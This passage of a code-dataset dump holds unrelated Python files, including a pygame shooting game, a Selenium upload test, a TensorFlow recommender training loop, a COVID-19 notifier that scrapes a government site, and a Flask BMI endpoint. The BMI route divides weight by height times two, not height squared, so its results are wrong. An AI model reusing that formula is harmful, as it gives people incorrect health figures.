pygame\nimport math\nfrom random import randint\ndef pythagoras(x1,y1,x2,y2):\n return math.dist((x1,y1),(x2,y2))\n\npygame.init()\n\npygame.mixer.music.load(r\"E:\\dev\\python_workspace\\sounds\\backsound.mp3\")\npygame.mixer.music.set_volume(0.5) # 1~0.1\npygame.mixer.music.play(1)\n\nfsound = pygame.mixer.Sound(r\"E:\\dev\\python_workspace\\sounds\\fire.wav\")\nfsound.set_volume(0.5) # 1~0.1\nssound = pygame.mixer.Sound(r\"E:\\dev\\python_workspace\\sounds\\scream.wav\")\nssound.set_volume(0.5) # 1~0.1\nrsound = pygame.mixer.Sound(r\"E:\\dev\\python_workspace\\sounds\\reload.wav\")\nrsound.set_volume(0.5) # 1~0.1\n\nscreen_width = 1280\nscreen_height = 720\n\nscreen = pygame.display.set_mode((screen_width,screen_height))\n\npygame.display.set_caption(\"hunt\")\nbg1 = pygame.image.load(r'E:\\dev\\python_workspace\\img\\bg.jpg')\nbg2 = pygame.image.load(r'E:\\dev\\python_workspace\\img\\bg.jpg')\nbg1x = 0\nbg2x = 1404\nrw = 75\nrh = 96\nrx = 500\nry = 200\ngox = randint(-1,1)*2\ngoy = randint(-1,1)*2\nrabbit1img = pygame.image.load(r'E:\\dev\\python_workspace\\img\\rabbit1.png')\nrabbit2img = pygame.image.load(r'E:\\dev\\python_workspace\\img\\rabbit2.png')\nrabbit1 = pygame.transform.scale(rabbit1img,(rw,rh))\nrabbit2 = pygame.transform.scale(rabbit2img,(rw,rh))\n\nsnipe = pygame.image.load(r'E:\\dev\\python_workspace\\img\\snipe2.png')\nsnipe = pygame.transform.scale(snipe,(74,74))\nsnix = 300\nsniy = 300\n\nholeL = []\nholeimg = pygame.image.load(r'E:\\dev\\python_workspace\\img\\hole.png')\nholeimg = pygame.transform.scale(holeimg,(16,16))\nholex = 2000\nholey = 2000\n# rsize = 100\nrebound = 0 #반동변수\n\npygame.font.init()\nmyFont = pygame.font.SysFont(\"Comic Sans MS\",30)\nscore = 0\n\nclock = pygame.time.Clock()\ncnt = 0\nisRunning = True\nwhile isRunning:\n cnt += 2\n bg1x -= 4\n bg2x -= 4\n rw = int(75*(1+ry/400))\n rh = int(96*(1+ry/400))\n if bg1x <= -1404:\n bg1x = 1404\n if bg2x <= -1404:\n bg2x = 1404\n fps = clock.tick(60)\n #print(\"fps :\",clock.get_fps())\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n isRunning = False\n # if event.type == pygame.KEYUP:\n # if event.key == pygame.K_LEFT:\n # rx -=5\n # elif event.key == pygame.K_UP:\n # ry -=5\n # elif event.key == pygame.K_RIGHT:\n # rx +=5\n # elif event.key == pygame.K_DOWN:\n # ry +=5\n if event.type == pygame.MOUSEBUTTONUP:\n if rebound == 0:\n rebound = 50\n holex,holey = pygame.mouse.get_pos()\n fsound.play()\n if pythagoras(rx+rw/2,ry+rh*3/5,holex,holey) < (rw+rh)/5:\n holeL.append([rx+(rw+rh)/5-holex,ry+(rw+rh)/5-holey,100])\n score += 10\n ssound.play()\n rx = randint(0,1200)\n ry = randint(0,700)\n snix,sniy = pygame.mouse.get_pos()\n if rebound == 30:\n rsound.play()\n keys = pygame.key.get_pressed()\n if keys[pygame.K_LEFT]:\n rx -=5\n cnt -= 1\n if keys[pygame.K_UP]:\n ry -=5\n cnt += 1\n # rsize -= 1\n # rabbit1 = pygame.transform.scale(rabbit1img,(rw*rsize//100,rh*rsize//100))\n # rabbit2 = pygame.transform.scale(rabbit1img,(rw*rsize//100,rh*rsize//100))\n \n if keys[pygame.K_RIGHT]:\n rx +=5\n cnt += 2\n if keys[pygame.K_DOWN]:\n ry +=5\n cnt += 1\n # rsize += 1\n # rabbit1 = pygame.transform.scale(rabbit1img,(rw*rsize//100,rh*rsize//100))\n # rabbit2 = pygame.transform.scale(rabbit1img,(rw*rsize//100,rh*rsize//100))\n\n if keys[pygame.K_1]:\n pygame.mixer.music.play()\n if keys[pygame.K_2]:\n pygame.mixer.music.stop()\n\n # gox += randint(-1,1)\n # goy += randint(-1,1)\n # rx += gox\n # ry += goy\n # for hole in holeL:\n # hole[0] += gox\n # hole[1] += goy\n \n if rx <= 0:\n rx = 0\n gox = randint(-1,1)*2\n if ry <= 0:\n ry = 0\n goy = randint(-1,1)*2\n if rx >= screen_width - rw:\n rx = screen_width - rw\n gox = randint(-1,1)*2\n if ry >= screen_height - rh:\n ry = screen_height - rh\n goy = randint(-1,1)*2\n screen.blit(bg1,(bg1x,0))\n screen.blit(bg2,(bg2x,0))\n if cnt%20<10:\n rabbit1 = pygame.transform.scale(rabbit1img,(rw,rh))\n screen.blit(rabbit1,(rx,ry))\n else:\n rabbit2 = pygame.transform.scale(rabbit2img,(rw,rh))\n screen.blit(rabbit2,(rx,ry))\n for hole in holeL:\n screen.blit(holeimg,(rx+(rw+rh)/5-hole[0]-8,ry+(rw+rh)/5-hole[1]-8))\n hole[2] -= 1\n if hole[2] == 0:\n holeL.remove(hole)\n if rebound > 0:\n rebound -= 2\n screen.blit(snipe,(snix-37,sniy-37-rebound))\n #antialias <== False\n #화상내의 선과 모서리를 매끄럽게 나타내는 효과\n txt = myFont.render(\"SCORE : \" + str(score), False, (255,0,0))\n screen.blit(txt, (550,50))\n pygame.display.update()\n\npygame.quit()","sub_path":"W5D5/game1.py","file_name":"game1.py","file_ext":"py","file_size_in_byte":4992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"158313443","text":"import os\nimport shutil\nimport pytest\nfrom contextlib import suppress\nfrom selenium import webdriver\n\nBASEDIR = os.path.dirname(__file__)\n\n\n@pytest.fixture(scope='module')\ndef browser(request):\n firefox = webdriver.Firefox()\n def fin():\n firefox.quit()\n request.addfinalizer(fin)\n return firefox\n\n\n@pytest.fixture\ndef path_to_directory_with_pictures():\n return os.path.join(BASEDIR, 'fixtures', '2015-03 Testdir')\n\n\n@pytest.fixture\ndef path_to_webapp_media_directory():\n return os.path.abspath(os.path.join(BASEDIR, '..', 'app', 'static', \n 'media'))\n\n \n\ndef test_upload_pictures_to_server(browser, host, \n path_to_directory_with_pictures,\n path_to_webapp_media_directory):\n\n # The user opens a browser and navigates to the webapp and a login form is\n # shown\n browser.get(url=\"http://{}/\".format(host))\n assert \"mediashare\" in browser.title.lower()\n \n # The user enters correct password\n print(\"Enter correct username and password\") \n\n # A user copies a directory with pictures to the server with a file manager\n basename = os.path.basename(path_to_directory_with_pictures)\n parent_dir = os.path.dirname(path_to_directory_with_pictures)\n target_dir = os.path.join(path_to_webapp_media_directory, \n basename + 'åÅ äÄ öÖ')\n os.chdir(parent_dir)\n if os.path.isdir(target_dir):\n shutil.rmtree(target_dir)\n shutil.copytree(basename, target_dir)\n \n # The user refreshes the page and the just uploaded directory is shown\n browser.refresh()\n directory_elements = browser.find_elements_by_id('directory')\n assert any([basename in li.text for li in directory_elements])\n \n # The user clicks on the directory and the app shows a list of pictures\n browser.find_element_by_link_text(directory_elements[0].text).click()\n picture_elements = browser.find_elements_by_tag_name('img')\n assert len(picture_elements) > 0\n \n # Cleanup\n shutil.rmtree(target_dir)\n os.chdir(BASEDIR)\n","sub_path":"tests/test_functional.py","file_name":"test_functional.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"214594125","text":"class Solution(object):\n def twoSum(self, numbers, target):\n \"\"\"\n :type numbers: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n l, r = 0, len(numbers) - 1\n while l < r:\n if numbers[l] + numbers[r] == target:\n return l + 1, r + 1\n elif numbers[l] + numbers[r] < target:\n l += 1\n else:\n r -= 1\n\nif __name__ == '__main__':\n sol = Solution()\n print(sol.twoSum([1,2,3,4], 7))","sub_path":"167 Two Sum II - Input array is sorted/untitled.py","file_name":"untitled.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"460413920","text":"'''\nStudio Publish v0.1 \nDate: August 12, 2018\nLast modified: August 12, 2018\nAuthor: Subin. Gopi(subing85@gmail.com)\n\n# Copyright(c) 2018, Subin Gopi\n# All rights reserved.\n\n# WARNING! All changes made in this file will be lost!\n\nDescription\n This module contain studio publish.\n'''\n\nimport warnings\nimport os\nimport importlib\n\nfrom pprint import pprint\n\nfrom module import studioValidation\nfrom module import studioBucket\n\nimport imp\nimp.reload(studioBucket)\n\nPUBLISH_PATH = 'Z:/package_users/sid/package/publish'\nRELASE_PATH = 'Z:/shows'\n\nglobal result\n\n\nclass Publish(studioValidation.Validation):\n\n def __init__(self, step, cube):\n '''\n step = 'conceptArt'\n cube = 'Bat'\n '''\n if not step:\n warnings.warn(\n 'class Validation initializes(__init__) None', Warning)\n if not cube:\n warnings.warn(\n 'class Validation initializes(__init__) None', Warning)\n\n self.step = step\n self.cube = cube\n\n self.bucket = studioBucket.Bucket(bucket=None,\n step=self.step,\n cube=self.cube)\n self.currentBucket = self.bucket.bucket\n self.bucket.setCurrentBucket()\n self.bucket.setCurrentStep()\n self.bucket.setCurrentCube()\n self.path = os.path.abspath(os.path.join(PUBLISH_PATH,\n self.currentBucket,\n self.step)).replace('\\\\', '/')\n\n self.collect() \n\n def validatorBundles(self):\n bundles = self.getValidBundles('validator', valid=True)\n return bundles\n\n def extractorBundles(self):\n bundles = self.getValidBundles('extractor', valid=True)\n pprint(bundles)\n\n def releaseBundles(self):\n bundles = self.getValidBundles('release', valid=True)\n pprint(bundles)\n\n def excuteCommon(self, validators):\n #result = None\n for each_module, module_value in validators.items():\n bundle_name = module_value['__name__']\n from_line = 'from publish.{}.{} import {}'.format(self.currentBucket,\n self.step,\n bundle_name,\n bundle_name)\n \n\n result_line = '\\n{}.trailRun()'.format(bundle_name)\n current_module = from_line + result_line\n\n try:\n exec(from_line)\n result = eval(result_line)\n except Exception as exceptResult:\n result = 'error'\n print(exceptResult)\n print(result)\n\n from publish.asset.conceptArt import oneKMap_extractor\n import imp\n imp.reload(oneKMap_extractor)\n \n oneKMap_extractor.trailRun()\n \n def excuteValidator(self, validators):\n self.excuteCommon(validators)\n\n def excuteExtractor(self, extractors):\n self.excuteCommon(extractors)\n\n def excuteRelease(self, releases):\n self.excuteCommon(releases)\n\n def doPublish(self):\n pass\n\n def getDetails(self):\n pass\n\n\npath = 'Z:/package_users/sid/package/publish/asset/conceptArt'\nstep = 'conceptArt'\ncube = 'Bat'\nval = Publish(step, cube)\nvalidator = val.validatorBundles()\nval.excuteValidator(validator)\n","sub_path":"module/studioPublish.py","file_name":"studioPublish.py","file_ext":"py","file_size_in_byte":3489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"550680871","text":"from django.conf.urls import patterns, include, url\n\nfrom amigo import views\n\nurlpatterns = patterns('',\n\turl(r'^$', 'amigo.views.index', name='listar'),\n\turl(r'^busca/$', 'amigo.views.busca', name='busca'),\n\turl(r'^solicitacoes/$', 'amigo.views.solicitacoes', name='solicitacoes'),\n\turl(r'^seguir/(?P\\d+)/$', 'amigo.views.seguir', name='seguir'),\n\turl(r'^autorizar/(?P\\d+)/$', 'amigo.views.autorizar', name='autorizar'),\n\t#url(r'^cadastrar/$', views.CadastrarPadrao.as_view(), name='cadastrar'),\n\t#url(r'^editar/(?P\\d+)/$', views.EditarPadrao.as_view(), name='editar'),\n\t#url(r'^deletar/(?P\\d+)/$', views.DeletarPadrao.as_view(), name='deletar'),\n)","sub_path":"amigo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"465639847","text":"# -*- coding: utf-8 -*-\n\nfrom pybel.constants import *\nfrom ..utils import build_template_environment, render_template_by_env\n\n__all__ = [\n 'render_template',\n 'default_color_map'\n]\n\nHERE = os.path.dirname(os.path.abspath(__file__))\nTEMPLATE_ENVIRONMENT = build_template_environment(HERE)\n\n\ndef render_template(template_filename, context=None):\n return render_template_by_env(TEMPLATE_ENVIRONMENT, template_filename, context=context)\n\n\n#: The color map defining the node colors in visualization\ndefault_color_map = {\n PROTEIN: \"#1F77B4\",\n PATHOLOGY: \"#FF7F0E\",\n BIOPROCESS: \"#2CA02C\",\n MIRNA: \"#D62728\",\n COMPLEX: \"#9467bd\",\n COMPOSITE: \"#9467bd\",\n REACTION: \"#8c564b\",\n GENE: \"#e377c2\",\n ABUNDANCE: \"#bcbd22\",\n RNA: \"#17becf\"\n}\n","sub_path":"src/pybel_tools/visualization/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"649254354","text":"\"\"\"\nA notification system for COVID-19 (Coronavirus) status\n\"\"\"\n\nfrom plyer import notification\nimport requests\nfrom bs4 import BeautifulSoup\nimport time\n\n\ndef notifyMe(title, message):\n notification.notify(\n title=title,\n message=message,\n app_icon=\"icon_path/icon.ico\",\n timeout=10\n )\n\n\ndef getData(url):\n r = requests.get(url)\n return r.text\n\n\nif __name__ == '__main__':\n while True:\n # notifyMe(\"Rohit\", \"Let's stop this virus spread.!!\")\n myHtmlData = getData('https://www.mohfw.gov.in/')\n # print(myHtmlData)\n soup = BeautifulSoup(myHtmlData, 'html.parser')\n # print(soup.prettify())\n myDataStr = \"\"\n for tr in soup.find_all('tbody'):\n myDataStr += tr.get_text()\n myDataStr = myDataStr[1:]\n\n itemList = myDataStr.split('\\n\\n')\n states = ['Bihar', 'Maharashtra', 'Delhi', 'Karnataka']\n for item in itemList[0:31]:\n dataList = (item.split('\\n'))[1:]\n if dataList[1] in states:\n nTitle = 'Cases of Covid-19'\n nText = f\"State : {dataList[1]}\\nTotal Confirmed Cases : {dataList[2]}\\nCured/Discharged : {dataList[3]}\\nDeath : {dataList[4]}\"\n notifyMe(nTitle, nText)\n time.sleep(4)\n time.sleep(3600)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"519616993","text":"\nimport sys, os, getopt\nimport re\nimport subprocess\n\ndef main(argv):\n usagestring = 'batch_ida.py --ida= --script= [--diagnostic]'\n\n \n try:\n opts, args = getopt.getopt(argv,\"\",[\"ida=\",\"script=\", \"diagnostic\"])\n except getopt.GetoptError:\n print(usagestring)\n sys.exit(2)\n\n idapath = {}\n scriptpath = {}\n diagnostic = False\n\n for opt, arg in opts:\n if opt == \"--ida\":\n idapath = arg\n elif opt==\"--script\":\n scriptpath = arg\n elif opt==\"--diagnostic\":\n diagnostic = True\n\n \n if not idapath or not scriptpath:\n print(usagestring)\n sys.exit(2)\n \n backupRegularExp = re.compile(\".*_[0-9]+.idb\")\n\n for entryName in os.listdir(\".\"):\n if entryName.endswith(\".idb\"):\n if backupRegularExp.match(entryName):\n if diagnostic: print(\"Ignoring %s, detected as backup\", entryName)\n else:\n # note: We can not use subprocess.call with a list of args because somehow it messes up the scriptpath if it contains a space (necessary for scripts with params)\n commandToExecute='\\\"{}\\\" -A -S\\\"{} --exitida\\\" \"{}\"'.format(idapath, scriptpath, entryName)\n if not diagnostic:\n print(\"Running sctipt for %s\" % entryName)\n try:\n subproc = subprocess.run(commandToExecute, check=True, capture_output=True)\n except subprocess.CalledProcessError as e:\n print(\"Failed to run '%s' with error:\" % commandToExecute)\n print(e.stderr)\n sys.exit(e.returncode)\n\n else:\n print(\"Would call:\\n{}\\n\".format(commandToExecute))\n print(\"Done executing batch !\")\n \n \n \nif __name__ == \"__main__\":\n main(sys.argv[1:])","sub_path":"scripts/IDA/batch_ida.py","file_name":"batch_ida.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"174247448","text":"import os\r\nimport time\r\nimport pickle\r\nimport random\r\nimport numpy as np\r\nimport pandas as pd\r\nimport tensorflow as tf\r\nimport sys\r\nimport csv\r\nimport eval\r\nfrom input import DataInput\r\nfrom model import Model\r\n\r\n#os.environ['CUDA_VISIBLE_DEVICES'] = '-1'\r\nrandom.seed(1234)\r\nnp.random.seed(1234)\r\ntf.set_random_seed(1234) \r\n\r\nlearning_rate = 0.1\r\nkeep_prob = 1\r\nlambda_reg = 0.01\r\ntrunc_len = 20\r\ntrain_batch_size = 64\r\ntest_batch_size = 64\r\nhidden_u = 10\r\nhidden_i = 10\r\n\r\n\r\nworkdir = '/cluster/home/it_stu11/qitian/KDD/data'\r\nwith open(workdir+'/Clothing_dataset_-2_new.pkl', 'rb') as f:\r\n\ttrain_set = pickle.load(f)\r\n\ttest_set = pickle.load(f)\r\n\tu_his_list = pickle.load(f)\r\n\ti_his_list = pickle.load(f)\r\n\tuser_count, item_count, example_count = pickle.load(f)\r\n \r\ndef calc_metric(score_label_u):\r\n\tscore_label_u = sorted(score_label_u, key=lambda d:d[0], reverse=True)\r\n\tprecision = eval.precision_k(score_label_u, 3)\r\n\trecall = eval.recall_k(score_label_u, 3)\r\n\ttry:\r\n\t\tf1 = 2*precision*recall/(precision+recall)\r\n\texcept:\r\n\t\tf1 = 0\r\n\tauc = eval.auc(score_label_u)\r\n\tndcg = eval.ndcg_k(score_label_u, 3)\r\n\treturn precision, recall, f1, auc, ndcg\r\n\t\t\r\ndef _eval(sess, model, test_set_list):\r\n\tloss_sum = 0.\r\n\tPrecision = 0.\r\n\tRecall = 0.\r\n\tF1 = 0.\r\n\tAUC = 0.\r\n\tNDCG = 0.\r\n\tnum = 0\r\n\tscore_label_all = []\r\n\tfor i in range(len(test_set_list)):\r\n\t\tuid = test_set_list[i][0][0]\r\n\t\tu_his_all = u_his_list[uid]\r\n\t\ttest_set_list_u = test_set_list[i]\r\n\t\tuid1_list, iid1_list, label1_list = [], [], []\r\n\t\tuid2_list, iid2_list, label2_list = [], [], []\r\n\t\tu_his, u_his_l = [], []\r\n\t\ti_his, i_his_l = [], []\r\n\t\tfor s in test_set_list_u:\r\n\t\t\tuid1_list.append(uid)\r\n\t\t\tiid1_list.append(s[1])\r\n\t\t\tlabel1_list.append(s[2])\r\n\t\t\tu_his_u, i_his_i = [], []\r\n\t\t\tfor i in u_his_all:\r\n\t\t\t\tif i==s[1]:\r\n\t\t\t\t\tbreak\r\n\t\t\t\tu_his_u.append(i)\r\n\t\t\tu_his_u = u_his_u[max(len(u_his_u)-trunc_len, 0):len(u_his_u)]\r\n\t\t\tu_his_l_u = len(u_his_u)\r\n\t\t\tif u_his_l_u<=0:\r\n\t\t\t\tu_his_u = [0]\r\n\t\t\tu_his.append(u_his_u)\r\n\t\t\tu_his_l.append(u_his_l_u)\r\n\t\t\ti_his_all = i_his_list[s[1]]\r\n\t\t\tfor u in i_his_all:\r\n\t\t\t\tif u==s[0]:\r\n\t\t\t\t\tbreak\r\n\t\t\t\ti_his_i.append(u)\r\n\t\t\ti_his_i = i_his_i[max(len(i_his_i)-trunc_len, 0):len(i_his_i)]\r\n\t\t\ti_his_l_i = len(i_his_i)\r\n\t\t\tif i_his_l_i<=0:\r\n\t\t\t\ti_his_i = [0]\r\n\t\t\ti_his.append(i_his_i)\r\n\t\t\ti_his_l.append(i_his_l_i)\r\n\t\t\tfor k in range(2):\r\n\t\t\t\tneg = s[1]\r\n\t\t\t\twhile neg==s[1]:\r\n\t\t\t\t\tneg = np.random.randint(0, item_count)\r\n\t\t\t\tuid1_list.append(uid)\r\n\t\t\t\tiid1_list.append(neg)\r\n\t\t\t\tlabel1_list.append(0)\r\n\t\t\t\tu_his.append(u_his_u)\r\n\t\t\t\tu_his_l.append(u_his_l_u)\r\n\t\t\t\ti_his.append(i_his_i)\r\n\t\t\t\ti_his_l.append(i_his_l_i)\r\n\t\t\tuid2_list.append(uid)\r\n\t\t\tiid2_list.append(s[1])\r\n\t\t\tlabel2_list.append(s[2])\r\n\t\t\tfor k in range(2):\r\n\t\t\t\tneg = s[0]\r\n\t\t\t\twhile neg==s[0]:\r\n\t\t\t\t\tneg = np.random.randint(0, user_count)\r\n\t\t\t\tuid2_list.append(neg)\r\n\t\t\t\tiid2_list.append(s[1])\r\n\t\t\t\tlabel2_list.append(0)\r\n\t\tu_his_maxlength = max(max(u_his_l), 1)\r\n\t\tu_hisinput = np.zeros([len(uid1_list), u_his_maxlength], dtype=np.int32)\r\n\t\tfor i, ru in enumerate(u_his):\r\n\t\t\tu_hisinput[i, :len(ru)] = ru[:len(ru)]\r\n\t\ti_his_maxlength = max(max(i_his_l), 1)\r\n\t\ti_hisinput = np.zeros([len(iid1_list), i_his_maxlength], dtype=np.int32)\r\n\t\tfor i, ru in enumerate(i_his):\r\n\t\t\ti_hisinput[i, :len(ru)] = ru[:len(ru)]\r\n\t\tdatainput1 = (uid1_list, iid1_list, label1_list)\r\n\t\tdatainput2 = (uid2_list, iid2_list, label2_list)\r\n\t\tscore, loss = model.eval(sess, datainput1, datainput2, u_hisinput, u_his_l, i_hisinput, i_his_l)\r\n\t\tscore_label_u = []\r\n\t\tfor i in range(len(score)):\r\n\t\t\tscore_label_u.append([score[i], label1_list[i]])\r\n\t\t\tscore_label_all.append([score[i], label1_list[i]])\r\n\t\tprecision, recall, f1, auc, ndcg = calc_metric(score_label_u)\r\n\t\tloss_sum += loss\r\n\t\tPrecision += precision\r\n\t\tRecall += recall\r\n\t\tF1 += f1\r\n\t\tAUC += auc\r\n\t\tNDCG += ndcg\r\n\t\tnum += 1\r\n\tscore_label_all = sorted(score_label_all, key=lambda d:d[0], reverse=True)\r\n\tGP = eval.precision_k(score_label_all, 0.3*len(score_label_all))\r\n\tGAUC = eval.auc(score_label_all)\r\n\treturn loss_sum/num, Precision/num, Recall/num, F1/num, AUC/num, NDCG/num, GP, GAUC\r\n\r\n#log_txt = open('/home/myronwu/ijcai2019/code/MetaDSR/log/'+'2018-12-24-1.txt', 'w')\r\n\r\ntest_set_df = pd.DataFrame(test_set, columns=['uid', 'iid', 'label'])\r\ntest_set_list = []\r\nfor uid, hist in test_set_df.groupby('uid'):\r\n\ttest_set_list_u = []\r\n\tfor i in range(hist.shape[0]):\r\n\t\ttest_set_list_u.append([hist.iloc[i][0], hist.iloc[i][1], hist.iloc[i][2]])\r\n\ttest_set_list.append(test_set_list_u)\r\ngpu_options = tf.GPUOptions(allow_growth=True)\r\nwith tf.Session() as sess:\r\n\tmodel = Model(user_count, item_count)\r\n\tsess.run(tf.global_variables_initializer())\r\n\tsess.run(tf.local_variables_initializer()) \r\n\t#model.restore(sess, '/home/myronwu/save_model/DUAL_GAT.ckpt')\r\n\r\n\tsys.stdout.flush()\r\n\tstart_time = time.time()\r\n\tTrain_loss_pre = 100\r\n\tbestP, bestR, bestF1, bestAUC = 0.0, 0.0, 0.0, 0.0\r\n\tfor _ in range(10000):\r\n\r\n\t\trandom.shuffle(train_set)\r\n\t\tepoch_size = round(len(train_set) / train_batch_size)\r\n\t\titer_num, loss_r_sum, loss_reg_sum = 0, 0., 0.\r\n\t\tfor _, datainput1, datainput2, u_hisinput, u_his_l, i_hisinput, i_his_l in DataInput(train_set, u_his_list, i_his_list, train_batch_size, trunc_len, user_count, item_count):\r\n\t\t\tloss_r, loss_reg = model.train(sess, datainput1, datainput2, u_hisinput, u_his_l, i_hisinput, i_his_l, learning_rate, keep_prob, lambda_reg)\r\n\t\t\titer_num += 1\r\n\t\t\tloss_r_sum += loss_r\r\n\t\t\tloss_reg_sum += loss_reg\r\n\r\n\t\t\tif model.global_step.eval() % 1000 == 0:\r\n\t\t\t\tTrain_loss_r = loss_r_sum / iter_num\r\n\t\t\t\tTrain_loss_reg = loss_reg_sum / iter_num\r\n\t\t\t\tTest_loss, P, R, F1, AUC, NDCG, GP, GAUC = _eval(sess, model, test_set_list)\r\n\t\t\t\tprint('Epoch %d Step %d Train: %.4f Reg: %.4f Test: %.4f P: %.4f R: %.4f F1: %.4f AUC: %.4f' %\r\n\t\t\t\t(model.global_epoch_step.eval(), model.global_step.eval(), Train_loss_r, Train_loss_reg, Test_loss, P, R, F1, AUC))\r\n\t\t\t\tprint('Best P: %.4f Best R: %.4f Best F1: %.4f Best AUC: %.4f' %\r\n\t\t\t\t(bestP, bestR, bestF1, bestAUC))\r\n\t\t\t\titer_num = 0\r\n\t\t\t\tloss_r_sum, loss_reg_sum = 0., 0.\r\n\t\t\t\tif AUC > bestAUC:\r\n\t\t\t\t\tmodel.save(sess, '/cluster/home/it_stu11/qitian/KDD/save_model/DEEMS_RNN.ckpt') \r\n\t\t\t\t\tbestAUC = AUC\r\n\t\t\t\tif P > bestP: \r\n\t\t\t\t\tbestP = P\r\n\t\t\t\tif R > bestR: \r\n\t\t\t\t\tbestR = R\r\n\t\t\t\tif F1 > bestF1: \r\n\t\t\t\t\tbestF1 = F1\r\n\t\t\t\t#log_txt.write('Epoch %d Step %d Train_r_loss: %.4f Train_loss_sn: %.4f Test_loss: %.4f MAE: %.4f MRSE: %.4f Best_mae: %.4f Best_RMSE: %.4f' %\r\n\t\t\t\t#(model.global_epoch_step.eval(), model.global_step.eval(), Train_loss_r, Train_loss_sn, Test_loss, MAE, RMSE, best_mae, best_rmse))\r\n\r\n\t\t#print('Epoch %d DONE\\tCost time: %.2f' %\r\n\t\t#(model.global_epoch_step.eval(), time.time()-start_time))\r\n\t\tsys.stdout.flush()\r\n\t\tmodel.global_epoch_step_op.eval()\r\n\t\t#if model.global_epoch_step.eval() % 10 == 9:\r\n\t\t#\tlearning_rate_sn = learning_rate_sn*0.9\r\n\r\n\t\t#if abs(Train_loss-Train_loss_pre) < 1e-6:\r\n\t\t#\tbreak\r\n\t\t#Train_loss_pre = Train_loss\r\n\t\r\n\r\n\tsys.stdout.flush()\r\n\t\r\n","sub_path":"DEEMS_RNN/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"196782844","text":"import numpy as np\nimport pickle\nimport pathlib\nfrom model import utils\nfrom scipy.stats import spearmanr\npath = pathlib.Path.cwd()\nif path.stem == 'DeepTMB':\n cwd = path\nelse:\n cwd = list(path.parents)[::-1][path.parts.index('DeepTMB')]\n import sys\n sys.path.append(str(cwd))\n\nt = utils.LogTransform(bias=4, min_x=0)\n\ndata = pickle.load(open(cwd / 'tables' / 'table_1' / 'DUKE-F1-DX1' / 'tumor_normal' / 'data' / 'data.pkl', 'rb'))\nancestry = pickle.load(open(cwd / 'files' / 'ethnicity.pkl', 'rb'))\n\n[data.pop(i) for i in list(data.keys()) if not data[i]]\n\nprint('without_ancestry')\nrun_predictions, test_idx, values, losses = pickle.load(open(cwd / 'tables' / 'table_2' / 'DUKE-F1-DX1' / 'tumor_normal' / 'results' / 'without_ancestry.pkl', 'rb'))\n\nnon_syn = ['Missense_Mutation', 'Nonsense_Mutation', 'Frame_Shift_Del', 'Frame_Shift_Ins', 'In_Frame_Del', 'In_Frame_Ins', 'Nonstop_Mutation']\nnon_syn_data = {i: sum([data[i][5].to_dict()[j] for j in data[i][5].index if j in non_syn]) for i in data}\ncutoff = np.percentile(list(non_syn_data.values()), 98)\nanc = np.array([ancestry.get(i[:12], 'OA') for i in data])\nanc_encoding = {'AA': 1, 'EA': 2, 'EAA': 3, 'NA': 4, 'OA': 0}\nanc = np.array([anc_encoding[i] for i in anc])\nmask = list(non_syn_data.values()) < cutoff\nanc = anc[mask]\np_TMB = np.array([sum([data[i][5].to_dict()[j] for j in data[i][5].index if j in non_syn]) / (data[i][1] / 1e6) for i in data])\np_TMB = p_TMB[mask]\nY = np.array([i[2] / (i[3] / 1e6) for i in data.values()])\nY = Y[mask]\n\n\nfor i in range(1, 5):\n print(i)\n mask = anc[np.concatenate(test_idx)] == i\n tmb_high = p_TMB[np.concatenate(test_idx)][mask] >= 5\n print(round(np.mean(np.abs(Y[np.concatenate(test_idx)][mask][tmb_high] - t.inv(np.concatenate(run_predictions)[mask][tmb_high]))), 2))\n print(round(spearmanr(t.inv(np.concatenate(run_predictions)[mask][tmb_high]), Y[np.concatenate(test_idx)][mask][tmb_high])[0], 2))\n\n\nprint('with ancestry')\nrun_predictions, test_idx, values, losses = pickle.load(open(cwd / 'tables' / 'table_2' / 'DUKE-F1-DX1' / 'tumor_normal' / 'results' / 'with_ancestry.pkl', 'rb'))\n\nfor i in range(1, 5):\n print(i)\n mask = anc[np.concatenate(test_idx)] == i\n tmb_high = p_TMB[np.concatenate(test_idx)][mask] >= 5\n print(round(np.mean(np.abs(Y[np.concatenate(test_idx)][mask][tmb_high] - t.inv(np.concatenate(run_predictions)[mask][tmb_high]))), 2))\n print(round(spearmanr(t.inv(np.concatenate(run_predictions)[mask][tmb_high]), Y[np.concatenate(test_idx)][mask][tmb_high])[0], 2))\n\n\n","sub_path":"tables/table_2/DUKE-F1-DX1/tumor_normal/analysis/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":2536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"528242743","text":"from flask import Flask, render_template\napp = Flask(__name__)\n\n\n@app.route('/bmi//')\ndef index(weight, height):\n weight = int(weight)\n height = float(height)\n BMI = weight/ (height*2)\n answer = 'HeHe'\n if BMI < 16 :\n answer = \"Severely Underweight\"\n elif BMI < 18.5 :\n answer = \"Underweight\"\n elif BMI < 25 :\n answer = \"Normal\"\n elif BMI < 30 :\n answer = \"Overweight\"\n else :\n answer = \"Obese\"\n return str(BMI) + \" \" +answer\n\nif __name__ == '__main__':\n 